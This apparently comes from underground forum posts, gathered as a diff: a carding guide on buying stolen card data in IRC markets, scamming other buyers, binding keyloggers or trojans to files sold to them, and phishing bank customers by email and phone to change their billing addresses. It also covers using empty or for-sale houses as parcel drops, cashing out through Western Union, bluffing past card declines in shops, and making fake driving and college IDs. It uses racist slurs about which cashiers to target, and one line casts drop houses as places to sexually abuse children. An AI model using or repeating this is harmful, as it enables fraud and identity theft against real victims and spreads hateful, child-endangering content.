+IRCs too such as cardersplanet, darkmarket etc. How I found him out was just on a normal scam bait I
+was doing, it wasn't a long one, but in the end he tried phishing me so I tried back and we had a laugh
+about it; I was straight up with him and told him I wanted to get deeper into the game, I looked up to his
+type of people and wanted to get rich/successful (I also shared the double claim secret about paypal with
+him which got him trusting me a little bit) he then sent me an invite to cardersplanet (this site was full of
+Nigerians). Eventually I went in the IRC (admittedly got ripped a few times) then started vending myself
+under various diff nicknames, then moved onto different sites like darkmarket and cardingzone when I'd
+got invites for them (although cardingzone is shit it's good to get in the IRC for starting off, you'll get
+invited to better forums the more you hang out in IRC, trust me). Don't ask me for invites to cardingzone,
+I was banned for ripping (I didn't rip anyone )
+The quicker way is to use these and search for certain keywords:
+www.irclinux.org
+www.irctrace.com
+www.irclog.org
+ircarchive.info
+www.irc-chat-logs.com
+http://www.irseek.com/
+And of course don't forget google.
+I'm only going to give you one clue for searching through google for a carding IRC, and that word is
+"undernet".
+Fellow carders don't like revealing their IRCs, and for obvious reasons.
+
+My advice is find a scammer through e-mail, and chat to him; be witty with it but be respectful to a fellow
+fraudster.
+Vendors and how to approach them
+Vendors are the people in IRC who are selling and providing the services for you. There are certain ways
+you should speak to vendors otherwise they're going to rip you (remember this is the black market, this is
+just like going up to a random drug dealer in the street and not knowing what you really want or what
+you're getting into; you'll get ripped off). Ask as many questions as possible of what you want to know, if
+you're buying a CVV2 ask to see proof of their details working (get them to make a small purchase
+somewhere; they should show you a before and after and the limits that are there on the card [there are
+methods out there of checking your balance; you can even get it through text/sms]. This is a market so
+remember there are more people that will be willing to buy from that vendor, it's open for all, you can get
+a full load of info including dumps for as low as £3/$5, drops usually go for £7; if someone is saying
+higher prices don't be afraid to haggle down to these prices or a little bit lower. COBs go for a little bit
+higher in ranges of £15-£20 because the vendor needs to get full info on someone and then change the
+billing address through the bank to where ever your drop is.
+Now when you go in the channel don't fucking say or request anything, shut up and see what the vendors
+are saying they have to offer and then send them a private message and talk to them. If any "vendor"
+messages you 1st trying to push onto you to buy from them then they're most likely a ripper; however
+don't piss off the rippers or assume someone is a ripper because you never know who is going to be there
+to help you out later on down the line or who might be pissed off enough to fuck you over.
+I can't give any big advice on not getting ripped in IRC because you don't personally know anyone in
+there at all, you just have to take your chances (expect to get ripped your 1st few times going in there, just
+don't go to them again, because if they get away with it once they'll definitely try again if you go back to
+them).
+DO NOT BUY ANY WU BUG(Western Union Bug); it is a massive ripper technique which is bullshit.
+The WU BUG used to work but was patched a looong time ago, most of the time now you'll get nothing
+or you'll end up with a rootkit on your comp. Rippers always say ridiculous prices for these too such as
+$200+; but if someone says lower prices it's still bullshit and most likely a rootkit/trojan/keylogger going
+to be installed on your machine while you get some useless program that does nothing.
+Ripping
+Easy as hell to do, not much photoshop skills needed really either.
+Bullshit and say you're selling full info (you're getting the info from fakenamegenerator.com or any credit
+card gen program; of course they don't fucking work), if they want to see proof just use your own legit
+CC or another stolen CC to buy something and show them proof of you buying it, except photoshop the
+details to that which you're going to be giving him later. Take payment through Western Union ONLY
+(since e-gold isn't around anymore), then just send him the bullshit info.
+If they want the report to go to their phone via SMS then just spoof a text with an sms bomber saying
+some bullshit reports. Then get the payment via WU.
+To get victims you message them 1st, message out in the whole channel 1st and then PM random buyers
+(look for ones requesting).
+::::WU BUG::::
+seriously this is bullshit, all people are doing are showing buyers fake screenshots made in PS or are
+actually making quick programs themselves and taking screens of them and then selling them, although
+essentially they're useless. You want to do this, but you want to actually send them a file as well, but bind
+a keylogger or trojan to it; not only can you rip them out of their cash to buy your infection but the info
+you get from spying on them will be so much more as well ranging from their info to other stolen CC
+info, you'll have a backdoor on what they do and can exploit it.
+
+If you can't be bothered making fake screenshots then get them from other rippers trying to sell them, get
+them to show you pics, vids and info; then use it for yourself and rip some n00bs.
+The following users say "It is so good to hear it!":
+Phishing for Change of billing
+A billing address is the details used for a person's bank account and most often their credit cards and
+everything else too, this includes their phone number too.
+What a change of billing (COB) is in a nutshell is changing the billing address registered to the card to
+your drop address you're gonna be using. When you want to card BIG at various online websites the
+orders will look more legit that you're not sending it else where other than the one registered to the card
+(obviously after you've changed the billing address), meaning the delivery of your goods will be quicker
+and will require a lot less verification.
+Most of the time you change the billing address over the phone but SOME banks will let you do it online;
+when you phone up to change it you use spoofcard.com or the pay as you go mobile phone you're going
+to be using when carding, or beige boxing
+When changing the billing address you need to know as much info as possible about the person's billing
+address you're changing, because the bank is going to ask you 3 security questions you set (such as
+mother's maiden name) before they change it.
+You can phish for details over the phone (see the phishin over the phone section above), however it's best
+to use keyloggers and phisher pages for this with a MIX of over the phone.
+Use through phishing pages
+2 methods here, 1 including over the phone, one isn't.
+The method without the phone is to just send a ton of e-mails out to random people and send them a html
+e-mail telling them they need to update their information before the account is suspended or their account
+with the bank will be cancelled, you have them go to a phisher page off the template and the phisher
+pages "requires" them to answer security questions like their mother's maiden name, their pet's name, you
+know those type of questions.
+Another method is to call them up pretending to be the bank and saying there have been different ip
+ranges logging on their account and they need to confirm their details online, link them to the phisher
+page and have them fill in the details; have the phisher page redirect to the actual online bank's login
+page; then ask if they've done that over the phone, tell them to wait a minute while you confirm and check
+it all out, say it's all clear and tell them to log in, they'll think nothing of it and you now have the answers
+to their secret questions which you can give to the bank itself when you go to change the billing address.
+Use through keylogging
+This is my favourite method and what I told S_E last night in IRC.
+You have a hardware (or software) keylogger set on someone's comp, use sock proxies when logging into
+their online bank account and then change their password, call them up pretending to be the bank and then
+get them to go to the actual online bank link and fill in their forgotten password options (answering secret
+questions) or of course get them to go to your phisher page and fill in the details (this is if you want to
+add more fields to get more info) then pretend to be checking it all over, then change their password again
+to some random letters and numbers and give it to them to log back in (it doesn't matter because they're
+keylogged and you'll get their new login if they change the password again anyway), you'll have all their
+info logged down too for you to answer your questions when you call the bank.
+
+Best time to do all of this is around the 10th day of the month (people usually get their credit reports at
+the start of every month), this will give you plenty of time to card enough for the remaining days until
+they see they're not getting their reports coming to them anymore (if you're crafty you can pretend to have
+cancelled the online bank account for them after they've gave you the info you need to know; I used to do
+this method and keep it going without them knowing).
+You need as much info as possible when calling up the bank to change the billing address.
+Drops and what you need to know about them
+Drops and what you need to know about them
+What drop locations are and what they’re used for
+Well simply a drop location is an abandoned house, or any house that is not under your name or any of
+your details. You can lead young children into these to make a sexy time with them, get items delivered to
+them that you want no one else to find about or risking finding, or just use it to squat in if you have no
+where else to go. Basically they are used in ways of keeping your nose clean and are used by mostly scam
+artists and sex offenders.
+How to find a drop location
+There are many ways of finding a drop location for use, whether it temporarily or permanently (although I
+suggest swapping and changing locations because my main last one I used got raided or broken into and
+is boarded up and too hot to use); I will suggest 3 ways on how you can find some for you to use.
+One final tip is don’t bother going for houses that are boarded up at the front where it is visible to passers
+by (it’s okay if round the back is boarded up)
+Way #1
+As just mentioned you can go about it many different ways but one of the ways the way I prefer to go
+about it is you should be looking around some older housing estates and more ghetto areas (could also tie
+in with the sob story you feed to a paedophile/child predator you are possibly scamming). For example in
+Derby there is an area called Sinfin, but now there is 2 parts to it and they are New Sinfin and Old Sinfin.
+Old Sinfin is the are you would want to go to, because it’s older it’s most likely to be alot more houses
+abandoned or deemed unsafe (it’s bullshit).
+Or if you were lucky like I once were then you could ask around your mates if there are any empty houses
+in their area. If there are then you’re in luck and can even have your friend keep tabs and watching over it
+for you and give you details so you can keep it all under wraps and safe. It may be alot riskier with
+neighbour hood watch morons, and nosey neighbours, but it’s still ideal and a little bit less suspicious
+than the abandoned houses in the older estates, and this is because the older estates usually have all
+abandoned houses close by, where as the odd one out covered with a street filled with inhabitants will
+seem less suspicious to the postman.
+Way #2
+Now this is a temporary way of finding a drop location, but is sometimes an effective ways and means of
+getting what you need but has a bit more risk to it; and personally is a way I have never used even till
+today.
+Have you ever been eavesdropping on a conversation between a neighbour and one of their family
+member’s or friends’, or been down the pub and heard the common as muck chavs boasting about a
+holiday they are going away on for however long they say they’re going away for?
+Well listen out for these type of conversations. Because them away on holiday means the house is most
+likely going to be empty for however long they’re going away for. So if you already know where they
+live then that’s great the job is made easier; if you know their first name and surname then look them up
+in the phone directory and find their address to go along with the number. If you don’t know where they
+live, or their name then just listen out to see if you can hear their names come up in conversation; just
+remember that if it’s in the pub it’s most likely local to it that they live, so you could easily find out by
+
+following them home and seeing.
+Way #3
+Possibly the safest, easiest way of finding, and quickest way to get a drop location.
+Most areas have houses up for sale am I right?
+Or houses that are up for bidding on, am I right?
+Well they have a website with a full list of your local area(s) that have houses up for bidding on and for
+sale.
+For example I would search Derbyhomefinders and look at the list on their site.
+All of these houses are empty and often do not have a sign up outside them either (if they do then just
+take it down and hide it somewhere for the time being).
+The advantage to using the lists to find the drop locations to use is it will usually say when the bid is up or
+if the house has been sold (this lets you know that it will not be ideal to use that certain house now it’s
+most likely to be inhabited) and will have the houses on there that are still being bidded on and that are
+still up for sale, these are the ones you want to be using.
+The best thing about this though is that you have a full list of many different drops to use (like I said
+earlier it’s best to switch drop locations and use many different ones) and it is updated with new ones
+coming up and tells you full which ones are over and not usable.
+You just need to know your agencies for housing and find their website.
+Obtaining and using drop locations
+You’re probably thinking now I’ve got/found one that’s great and everything but how the fuck do I keep
+it a secret?
+for way 1
+this much is obvious that you do not tell anyone except your partner if you’re doing a team bait, and 1
+trustworthy friend to keep tabs on it if you are doing a bait on your own, and also the paedophile, but only
+when he asks. But there is alot more to it than that, also maintaining your abandoned house and making
+the postman think someone living there.
+Appearance isn’t everything at all in any case and it isn’t for this either, but of course you try to make
+yourself look as best as you can. The same principles are applied to keeping an abandoned house; you
+should atleast try to get a new lock put on the door which you will also have a key for; just so that if any
+druggies go there before you then they will have a tougher time getting in (of course it’s ideal you don’t
+get somewhere known to druggies but this is an example of what use it could have) but also if there is a
+fucked up lock on a door then it’s pretty damn obvious only low life scum or some criminal(s) are using
+the place, so buy a new lock for the door and get it fitted on, whether you do it yourself or get assistance
+from a friend who knows what they are doing.
+Now as for overgrowing plants and weeds, you can only do so much without being suspected. Do not use
+a lawn mower, use clippers and hack it as short as you can. It’s best to get all of this done when everyone
+is at work during the day time; but in reality it isn’t ideal at all and most criminals don’t tend to bother
+with this. Instead they will make it seem someone is in but is just too ill to do anything with the garden or
+is just a lazy fucker. They do this by often writing up a note and sticking it to the door or leaving it on the
+floor near the door saying something such as "No milk today please" or "Not in, please leave packages at
+post office".
+Write a few letters to yourself aswell ready to come on the same day as the parcel, this will make it look
+like you get mail and not just the one off suspicious package now and then.
+
+Now 2 alternatives, you can either get to the abandoned house and take the mail from the mailman while
+acting like you live there (you must look the part as lazy or disabled if you have ingrown plants in "your"
+garden) or you can leave a note saying to take any packages to the post office for pick up because you are
+at work or something along those lines.
+One final rule is do not be in and out of the hideout everyday or whatever, visit probably 2 or 3 times a
+week.
+Way 2
+Now there are 2 ways to go about this; you can either just get to the house early in the morning a little bit
+just before the postman arrives and be at the house outside pretending you’re just about to leave and then
+sign for the package (if you need to) and collect it off the postman and then be on your way after he’s
+gone. Or if you’re good at bypassing alarms (I have a guide on burglary) or the house has no alarm then
+you could bump key in at night time (not recommended) or during the day time the day before when
+everyone else will be at work aswell, and hide out there for a bit (hell even take some food that is left in
+the fridge and feed yourself since you’re spending the rest of the day and early morning there). Basic
+rules are don’t have tv on too loud if at all, or if you do then put head phones on into the tv if it’s that old
+of a model, and leave everything how it was left an say upstairs so incase any neighbours or anyone
+looking after the house while the owners are away come in then you have time to hide.
+Obviously if it’s a package you don’t have to sign for then you can stick up a note on the door early in the
+morning before the post man comes saying to leave it round the back or what ever excuse you wanna
+make up.
+Way #3
+Easy, just as previously except you don’t have to be as cautious and often the alarms are disabled for that
+time being anyway so you don’t have to worry as much if you bump key into it.
+As also stated previously in this guide, if there are any up for bidding/for sale signs then take them down
+and just get them out of the way.
+You can even go to this one the night before instead of day time because no one is hardly going to be
+watching over this unless it’s in a neighbourhood watch area (in which case you chose the wrong area
+anyway, you dumbass).
+Some basic tips to keep in mind
+-- Be there before the postman! can’t stress this enough, it’s too fucking obvious if you’re late.
+-- When signing for packages, if you need to, then sign a fake signature (the sig can be any made up fake
+shit) with your hand that you don’t write with, so it’s harder to trace incase things go tits up later on down
+the line.
+-- Take anything in any guide with a pinch of salt, things may be different circumstances for you and your
+situations; guides are to be used as basis’s.
+The following users say "It is so good to hear it!":
+CC scan tutz:
+Code:
+http://www.zshare.net/download/51706978a8180d65/
+http://www.zshare.net/download/51707169cc576e5d/
+Also will say the main reason we use SOCK proxies:
+Sock proxies can receive and send most types of internet traffic such as e-mails, java, flash etc; sock
+proxies are more private as well and much more secure.
+
+Socks traffic is anonymized as it is sent out and the incoming traffic is filtered.
+You can run most programs through SOCKS easier as well.
+Bear in mind it's wise to disable java, and flash and have your cookies cleared before and during use of
+the proxies as they can reveal your identity.
+Disable Javascript, until you need to use it (usually when submitting info).
+You can find socks(5) proxies online, scanning them to see which ones are still high in anonymity and are
+working is done through certain scanners you find online.
+I use accessdiver to check all my proxies from the lists I got.
+If I ever get a log in for anyproxy again (if I decide to start carding again) then I'll be sure to share some
+lists sometime.
+Infact you can actually buy them off the anyproxy.net website, except they're cheaper in IRC.
+An extra tip about drops: You can order it to any address you want really, call them up saying they got the
+address wrong and are sending it there instead (say you live on a street that sounds similar to theirs), ask
+if they can sign for it and keep it ther euntil you can pick it up after work. This is the best method.
+Also bear in mind about instore carding for the UK, becaus eof chip and pin it's ALOT harder to skim
+ATMs, you have to use the old ones that are in some paki shops. They're hard to find but they do still
+have them in places. For an example of what atm type I'm on about search for the skimming vid that The
+Real Hustle did.
+---------- Post added at 08:12 AM ---------- Previous post was at 08:09 AM ----------
+I think I should add the updates I posted in another thread in this one as well, it's some need to know shit.
+Nothing in here is outdated, but this is additional needed info.
+Carding isn't so easy unless you have full details and get them all changed, even then they may bring up a
+red flag, it depends on the site you're carding.
+To be easier for example I'd card people who live in the same country as me only, just to make the job
+easier. Why? IIN/BIN is one of the first things they check now. Unless you steal all of their details and
+call up the bank and tell them you're going "abroad", otherwise all transactions would just be stopped. Get
+the COB address changed also, obviously this still is absolutely needed to be done to avoid the top red
+flag. In that case it'd be only good for instore carding and if you'd phished the pin from them, or if you're
+buying from IRC get full info.
+Simple way, keep it to your only country and you'll have less work and trouble coming your way.
+If you're going to card then card big, but not the most expensive thing in stock obviously, don't fuck
+around with multiple small purchases.
+Identifying the place the card was issued from can be done through various methods;
+http://binbase.com/csv.php?module=search
+http://www.binchecker.com/
+2 to name a few.
+
+This will help you pick out the phished cards and which ones are of use to you.
+---------- Post added at 08:13 AM ---------- Previous post was at 08:12 AM ----------
+Ok back on topic folks, carding right wanna do it??
+Don't think it's as easy as getting a hold of a cc, going to dell.com and ordering a 1k laptop. It's not gonna
+work buddy. You need to find the best method to outsmart the merchant, they know all about this kind of
+fraud and they suspect it in many ways. Common sense is your best friend. Would it make sense if the
+'real' owner of the card orders 1k worth of electronics to an out of state random house. Sure it's possible,
+but they're not gonna buy it. First thing that's gonna happen is check the purchase, most likely the
+cardholder is gonna get a call from the bank but the transaction had probably already been canceled
+before this even happened. Why?? Because they know. It's your job to start researching on how to card
+successfully but I'll give you some tips for online carding.
+AVS
+There's a neat little trick, they only check numbers. So let's say the card owner's address is 673 W Dook
+st. You can find a drop that is 673 S. Dr Avenue. This will pass the AVS system.
+COB'S
+Means change of billing. There's a couple of ways to do it, online or by phone. Alot of banks only need
+ssn and dob so a lookup for them will sometimes do it. A little advice is do not card 2k 3 hours after you
+changed the billing. Wait about 3-4 days or maybe a week. Common sense buddy.
+BIN (bank identification number)
+keep logs of them, you found one that made you 5k?? save it and get it again. This is one of the most
+important things in carding and make sure you keep the gold to yourself.
+Western Union
+Yes it is possible, but it's a pain in the ass. You need to try and try...and keep trying til you discover the
+treasure. Make sure you get good credit reports.
+I'll tell you one thing though, USA cc suck ass. I recommend the good one's Germany, Denmark, Sweden,
+Greece. But some USA bins are still good just look.
+---------- Post added at 08:15 AM ---------- Previous post was at 08:13 AM ----------
+I just thought I'd add some more stuff about instore carding because someone I know had an error pop up
+on one of his cards today because his dumpz on one of the cards had died. This isn't usually a problem
+because this person used to skim for his own when it was easier, but now he buys them from IRC instead.
+When you buy dumpz from vendors and are a regular carder there will be times you're carding instore and
+have errors come up at the point of sale. Now because he chose a dumb nigger cashier this was easier to
+get out of, so keep in mind to go for nigger cashiers, younger people and dumb women.
+He got the worst error come up, which was "call for authorization". Now you do not want them to do this
+at all, so you should make it clear you don't have much time for this, tel them you'll call the bank
+tomorrow and ask them to try another one of your cards. There are many other excuses as well but this
+was the one the person I know used. You must pu your hand out as if to insist you want the card back
+whilst talking to them, most of the time they won't know whether to give it you back but will give it you
+back when put on the spot. If you don't have another card just say you will call the bank about it and
+come back tomorrow.
+The key to this however is to remain calm. Then give them another card.
+
+Another error is "declined". You'll get this eventually if you have good dumpz on your card, the limit has
+to end somewhere (get a good IIN to make more money). Before hand you should make out you're not
+sure how much money is on the card "I hope I have enough money to cover this", or when it's declined
+just stay calm and give them another card and tell them you think the limit must be gone on that one, you
+had a feeling that was going to happen; laugh it off. If you don't have another card on hand say you'll be
+back soon and you're going to the cash point.
+There's many other merchant error codes and I won't cover them all (I linked to them in another thread
+somewhere when kirby was mod) but once you have practice bullshitting with these errors you'll begin
+getting good at it, it's all pretty much the same action you should take anyway.
+Now you're probably thinking if you have the PIN as well then why not just cash out at the cash point and
+then pay in cash? You can only draw out £300 within 24 hours most cards.
+Also if you're carding expensive goods then have some other ID which matches the name on the credit
+card, they'll ask for this majority of the time if it's expensive goods. Sometimes the guy I know has been
+able to get away with just having a fake business name tag ID whipped up. This won't wash if you're
+carding rolexes or gemstones. It's best to have another form of fake ID like a driing licence or something
+like that.
+---------- Post added at 08:16 AM ---------- Previous post was at 08:15 AM ----------
+COB'S
+Means change of billing. There's a couple of ways to do it, online or by phone. Alot of banks only need
+ssn and dob so a lookup for them will sometimes do it. A little advice is do not card 2k 3 hours after you
+changed the billing. Wait about 3-4 days or maybe a week. Common sense buddy.
+BIN (bank identification number)
+keep logs of them, you found one that made you 5k?? save it and get it again. This is one of the most
+important things in carding and make sure you keep the gold to yourself.
+Western Union
+Yes it is possible, but it's a pain in the ass. You need to try and try...and keep trying til you discover the
+treasure. Make sure you get good credit reports.
+I'll tell you one thing though, USA cc suck ass. I recommend the good one's Germany, Denmark, Sweden,
+Greece. But some USA bins are still good just look.
+He's right about the COB. It takes a while to change now, so get it changed as early into the month as you
+can, the 8th or 9th is usually good enough for the guy I know.
+IINs are the most important now indeed if you want to make a good profit and not get busted by limits.
+UK IINs aren't that bad but the best ARE germany, spain and Turkey from what I've seen so far.
+I've got a huge list of IINs which I'm a little reluctant to share.
+As for Western Union I've heard you need a lot in a lot of countries but in the UK it's not too hard at all.
+Get some sock proxies and make an account online. Add the card details and
+the receivers details then go through the process.
+If it all goes well they give you a MTCN (money transaction control number).
+Call them up to confirm and answer their questions about why you're sending the money and if you know
+
+them. I usually give the excuse that I'm a job agent and it's his weekly pay. They ask other qustions like
+your D.O.B (this is why you need to be good at phishing or make sure you're buying fullz). They'll also
+ask the name of the bank that issued the card, so see the BIN/IIN checkers I linked earlier.
+I've heard of some people being asked if it's their first time making a transfer through WU from credit
+card. This is what catches you out or confirms the whole thing; just say yes, it's a 50/50 chance.
+Then go to a WU agent with fake ID of the contact details you gave of the reciever, or if you've got a
+trustworthy person to pick it up then give his and get him to pick it up.
+The shit thing is you can only send £100 each transaction and only £600 a month. That was with a UK
+IIN, I'm not sure if it'd be different with another card.
+Western Union is good for cashing out but it's not worth all of the stages and there are tons of easier
+ways.
+Novelty ID Guide
+Counterfeit ID Cards
+These are licenses that are completely different from the actual valid license. They may be designed to
+look "official" or they may follow a familiar, earlier license style.
+Altered ID Cards
+Additions and changes are often made to an actual, valid license, or a photograph of a valid license. This
+type of technique is used by minors for liquor purchase , by credit card defrauders who need supporting
+IS, and others involved in identity change efforts
+Forged ID Cards
+When alterations are combined with forgery of the license (usually adding a new photograph), fraud can
+be detected by checking for raised edges around the photograph, unauthorized lamination, a broken or
+partial signature and missing or partial state seals at photo edge.
+===============================================
+Fake ID Guide--All you ever wanted to know but were afraid to ask
+article by DrNick
+So you want to get drunk this weekend. Or buy some cigarettes. It is sometimes easier to buy marijuana
+and take advantage of the black market brought on by the War on Drugs. Or, follow on and learn how to
+kill your brain cells with alcohol.
+***
+Table of Contents
+I. Disclaimer/Legality
+A. Getting ID
+B. Making your own ID
+C. Buying ID
+D. Using the Fake ID
+
+***
+I. Disclaimer
+Fake ID is both a state and federal crime. If caught you might not be charged with both, but who knows?
+Usually making a fake ID is illegal in many states. It is usually a crime to alter existing state-issued ID, or
+to create a new fake ID. These crimes include forgery and fraud. They are no fun to get charged with.
+This site has some more info on it, it is a good example and food for thought:
+{hxxp://www.colorado.edu/sacs/ralphie/a/Appendix_B,_Alc.html}
+Using a fake ID to purchase alcohol or cigarettes is some sort of crime. These crimes all differ from state
+to state, so check your local laws. I do not advocate creating a fake or fraudulent id. This information is
+for informational and novelty use only. Do not break any laws. This is not intended for anyone evading
+prosecution, warrants, etc. I will not hinder prosecution. I do not know how to create a new identity.
+***
+A. Getting ID
+You can make it yourself or buy it. Some texts you might read talk about birth certificates and death
+certificates and all that crap. There are some links included which will take you there. This phile will help
+you make your own ID. This ID is intended primarily to get you into bars and help you buy beer. Don't
+even bother trying to fool a cop or fed with it.
+B. Making it yourself:
+You will need a various combination of the following tools, but these are just guidelines. You should try
+experimenting with different combinations and seeing which one works best for your ids! You can
+probably find all you need here at Staples or your local stationary store.
+1. Computer (if you don't have one just forget it)
+2. Color scanner for computer (or access to a friends)
+3. Color Printer (hardcore=die-sub printers, for home hacking try Epson 400, 600, 800 series)
+4. Software--Adobe Photoshop, Paint Shop Pro
+5. Cutting Tool: Exacto Knife (preferred method) or really sharp short blade on Swiss Army
+Knife (used to cut out the printed id from the rest of the paper)
+6. Adhesive: Strong Glue Stick or Double sided scotch tape (experiment here)
+7. Posterboard or Manila file folder or Metrocard (strengthens the card--experiment here)
+8. Contact paper (optional use only to get the right "look" or "feel")
+9. A pencil
+10. Paper to print front of id on--high quality inkjet or photoglossy depending on id. Don't even
+bother with copy paper.
+11. The ID you want to fake (whether it be New York, Connecticut, LILCO, or NYNEX)
+12. Nail File (for smoothing ID's edges).
+Also you might want to try 3M id cards. They come 2 to a sheet. Experiment.
+How to Make it:
+1. You need an ID or a template. You need to know what the legitimate 21 year old version of the ID
+looks like. Its good if you have a legit ID on hand to compare yours with. Check the "{The I.D. Checking
+Guide}" (hxxp://www.driverslicenseguide.com/) as an invaluable reference tool. It is a great book worth
+the order. If you need to scan in your own picture or ID make sure it is very clean. Use a high resolution,
+720 DPI is good. You must use at least 24 bit resolution. Making your own template is as easy as
+recognizing the important information on the id and how to correctly present it.
+2. Follow what the template says. Put the picture in the right place. Fill in the right blanks.
+
+3. Find a good medium to print on and work with. Remember you are going to need a front and back for
+this ID. I have seen fake NY State Ids using recycled Learners Permits. The new fake front is glued on
+top of a learners permit so the back is the same. Sometimes though you don't have an old license around.
+If not then scan the back of the drivers license and print it out on posterboard. Use the posterboard as the
+back. Its not perfect but close. Again, you are encouraged to experiment and see if you can find
+something better.. This is part of the process and helps you stay on your game as an artist.
+4. Print the front out. Use a high quality paper, photo glossy is not necessary and is sometimes too thick
+or glossy for the job. Depending on what ID you are imitating you may or may not need a laminating
+surface.
+5. Use a glue stick or double stick tape to adhere the front of your ID to the back.
+6. Trim the corners with the knife (if necessary). If necessary you might want to use a nail file to smooth
+the edges on the ID.
+***
+C. Purchasing Fake ID
+If you live in a big city (ie: New York) walk down to the business districts (ie: Times Square, Eighth
+Avenue, W. 47th Street) and you can find some shops. I am not 100% sure as I have never done this
+myself but my friends have. Look and listen. In New York you can sometimes buy fake ID in the back of
+luggage shops. Weird but true. It is often some fake looking out of state or some bad college id, but see if
+it suits your needs. Most of the net is full of crappy novelty ID, nothing to buy beer with. Info on the net
+will help you make your own.
+***
+D. Using the ID
+So, you finally got an ID. One that says your 21 or 18 or however old you need to be to buy items (to
+exercise your property rights!). So, now that you've invested $20-$100 you're all set, right? Wrong! If you
+were I wouldn't waste my time by writing this, or make you read it. This is free advice. Take it. Kant says
+the only right acts are those with good intentions. I try.
+Don't consume alcohol in public where doing so is prohibited by law (ie: on the street). This is because it
+is illegal and when some cop finds out you are not only drinking on his streets but not even twenty-one he
+will throw a fit. Save yourself the trouble.
+If your ID is successful or not depends on many things. Some are beyond your control, such as the club's
+policy on fake id. Some are within your control, such as how you present yourself and what you exude.
+Factors beyond your control:
+The setting. Ie: the bar, restaurant, store. Hopefully you can choose a place that is easily passable.
+Possibly within your control:
+Your server/bouncer. When in a grocery store DO go towards the 19 year old cashier. The younger ones
+usually care less about this whole ID thing. DO take advantage of the Korean/Pakistani Immigrant grocer.
+In the midst of all of Guiliani's Law and Order crackdown my friend at NYU can still buy his Coronas
+quite easily. The immigrant clerk questions my friend "Id?" To which my friend replies (with a smile)
+"Yes ID." Your biggest friend is your great personality. Look happy and confident and you will walk
+away with the beer. DON'T PANIC!
+What you can do:
+Know your fake birthday, name, address, zip code all that info on the card and your Zodiac sign. Go to a
+place that has accepted your ID in the past! This is my best advice. When waiting on a line for admission
+to a club have the ID ready--be confident! When you are purchasing at a grocery store or take out place it
+is nice to have it ready to present to the cashier. Try to view it as a formality that you are accustomed to
+engaging in. You are used to getting carded...remember?
+In a restaurant chances are about 50/50 you will be carded when ordering from a waiter. If you are with
+
+your parents these odds decrease, with your friends these odds increase. However I have been denied in
+older company and served with my friends. Lucky Chengs has been particularly lenient...of course in that
+case you wouldn't even need ID. What can I say? I am only trying to help.
+============================================
+How to build a fake College ID
+article by Bishop
+I. Introduction
+A Fake ID is realitively easy to make. In this article I will teach you how to build a fake College ID.
+College ID's are much easier than a drivers licence, becuase of the
+number of colleges. As long as they have your Date of Birth you'll be ok. It will be approx. $75.00
+investment to buy the equipment.
+II. Necessary Equipment
+I have built many fake College ID's perfectly so stick to the recepie
+GBC DocuSeal 30 -- Laminator
+GBC Laminating Pouches -- Laminate Card (25 to a box) (Badge Card Size)
+Bulldog Paper Slicer -- a cutting board and a slicer to make perfect cuts
+New Razor Blade -- allways prove useful
+Adobe Photoshop 4.0 -- Necessary Software
+Ink Jet printer -- never use a dot matrix! (color optional)
+Recent Photograph -- This will be a photo ID (wallet size)
+A VHS tape -- ya' know the kind you put in your VCR
+III. Using the Software
+Make dimention of the card 3.5 inches wide 2.333 inches tall Now using text only put in the name of a
+College one state away from you. Use only adverage colleges, not Yale or anything. Use Ariel Rounded
+MT Bold for the name of the college. Then under
+that use Calisto MT for the town the college is in.
+--------------------------------------
+| | |
+| Photo | Marywood |
+| goes | College |
+| here | |
+| | Scranton, PA. |
+| until the line | |
+| | date / here |
+--------------------------------------
+
+The graphic above is a rough disription
+Now you have the front, print out the card.
+Next you have to give the card a back.
+Make a new card with the same dimentions,
+type the below using Ariel Rounded MT Bold
+Birth Date: Height: Weight:
+___________ _______ _______
+___________________________________
+print out the file
+Use your Paper Slicer to cut out the card to the correct size. Then fill out the card
+with the approate information. An existing card like a drivers liscence or credit card
+can help. After both cards are cut out, get the badge card lamenate and insert both cards. Flip it over and
+make sure you've done it right. Take out your picture and use the Paper Slicer to cut the picture out to the
+size of the card and put it in place. Do not use any glue! Let the badge holder hold it in place.
+Now get out that VHS tape and take it apart. Carefully remove tape and measure the exact width of the
+paper card. Put the strip of film at the bottom on the Badge Card. It should look like a real card. You will
+notice a tint / blur in the card. This is ok, don't worry. After it is centered and cut PERFECTLY!!!!!
+put the card in the Leadered Carrier folder and make sure the stuff in the card doesn't move. Now plug in
+the Laminantor, wait a minute and it be warmed up. Make sure the green light is on. Put the laminantor in
+the on mode. Now slowly and carefully put in the folder adn laminate the card. Open the Carrier and take
+out you new ID!!!!!
+Please remember Fake ID's are an art NOT a science.
+Try a few before you quit and, don't settle for an ID that has a flaw, Fake ID's are against the law!
+IV. Getting away with it.
+REHEARSE YOUR INFORMATION! assure yourself you know that you were born in
+1978 or whatever year you need to be 18 or 21. I reccomend you keep the same name, height, weight you
+really have.
+==============================================
+How to build a fake College ID #2
+article by Epi
+Ok, so you just got a new ID and ya want something to go with it. College ID's are really simple and you
+only need these materials:
+1. Laminator (ya don't got it then I can't help)
+2. Computer art program (i.e. adobe photoshop, I used Polaroid Photomax Pro and it works fine)
+3. Butterfly pouches (10 mil)
+4. 8-up teslin (or pvc card)
+5. Printable transparencies
+6. Inkjet printer (at least!!!!!!)
+
+7. A scanned card or template
+8. The colleges logo
+9. Colleges fight song
+10. 3m glue spray (optional)
+11. Passport photo
+Ok, first, search the internet and get the logo once you do that, resize and place it in one corner
+(depending on the template). change the colors of the lines one the id into the college's colors. put your
+photo on and outline it with one of the college colors. Next, fill in all of your info (birth date, student #,
+etc., whatever you think you need).
+For the back, write the fight song on it and out it in the team colors. Some colleges use this, some dont, no
+clerk is gonna know this unless they went there. To finish up the template, put any finishing touches on it,
+its your choice.
+Now that your template is finished, you hav a choice: print it out on the teslin or print on the
+transparency. I'm not sure which works better, so sorry, your on your own for that.
+Once you print it, just laminate with the butterfly pouch. If your laminator only says 5 mil pouches, most
+will still laminate 10 mil, just run it through 3 times. The GBC docuseal will not, it bubbles. If you want
+to make it look even more real put a holo on it or someting. I don't know of any colleges that have a holo,
+but it just makes it look more real.
+Good Luck!!!
+==============================================
+Who Are You? How To Be Someone You're Not
+article by Bela_Lagousi
+Fake IDs
+Why do I need a fake ID?
+You may be asking yourself "Self, Why do I need a Fake ID?" Well There are several reasons, the most
+common being age. But there ARE other reasons. If you want an account at an Entertainment store you
+need some form of photo ID, Want to check out the Pool balls at the Hotel, We need to see some ID. You
